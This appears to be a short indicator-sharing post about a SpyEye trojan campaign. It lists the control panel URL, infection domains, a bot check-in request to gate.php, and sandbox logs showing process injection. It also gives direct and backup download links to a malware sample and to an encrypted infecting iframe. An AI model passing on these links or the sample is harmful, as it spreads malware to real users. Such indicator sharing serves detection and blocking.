Spy Eye Panel:
http://theimageshare.com/kurac/
Spy Eye Sample:
http://89.207.135.198/pas.exe
http://adf.ly/1x8Rp just in case first link is removed
Websites used to infect people:
butterflysolutions.net ??? iserdo need money ?
imageshare.cc
iserdo.net ???? lol
popusi.biz
HTTP QueriesHTTP Query Text
– 5xf9~x15x10x11x11x11x11x16x15x15x15x15x17x17x17x17x1ax1ax1ax1anx01!U4V:__-H8ty{{juuuux17xx0cS4A(LLx19jx0f}x0fN
theimageshare.com GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1
Windows Api CallsPId Image Name Address Function ( Parameters ) | Return Value
0x7e4 C:TESTsample.exe 0x403c3c CreateRemoteThread(hProcess: 0x40, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0xea012ed, lpParameter: 0xe600000, dwCreationFlags: 0x0, lpThreadId: 0x12fa3c)|0x38
0x2d8 C:cocacolais.execocacolais.exe 0x88e1db CreateRemoteThread(hProcess: 0x60, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0xea442ca, lpParameter: 0xe1c0000, dwCreationFlags: 0x0, lpThreadId: 0x12f5bc)|0x5
Files CreatedName Size Last Write Time Creation Time Last Access Time Attr
C:cocacolais.execocacolais.exe 229376 2007.07.27 12:00:00.000 2007.07.27 12:00:00.000 2008.08.08 09:14:22.234 0x20
C:cocacolais.execonfig.bin 20950 2007.07.27 12:00:00.000 2007.07.27 12:00:00.000 2008.08.08 09:14:22.234 0x20
iframe used to infect people from porn pictures:
code is encrypted u have to decrypt first to see it
http://adf.ly/1x8fJ
hosting infos:
http://whois.domaintools.com/89.207.135.198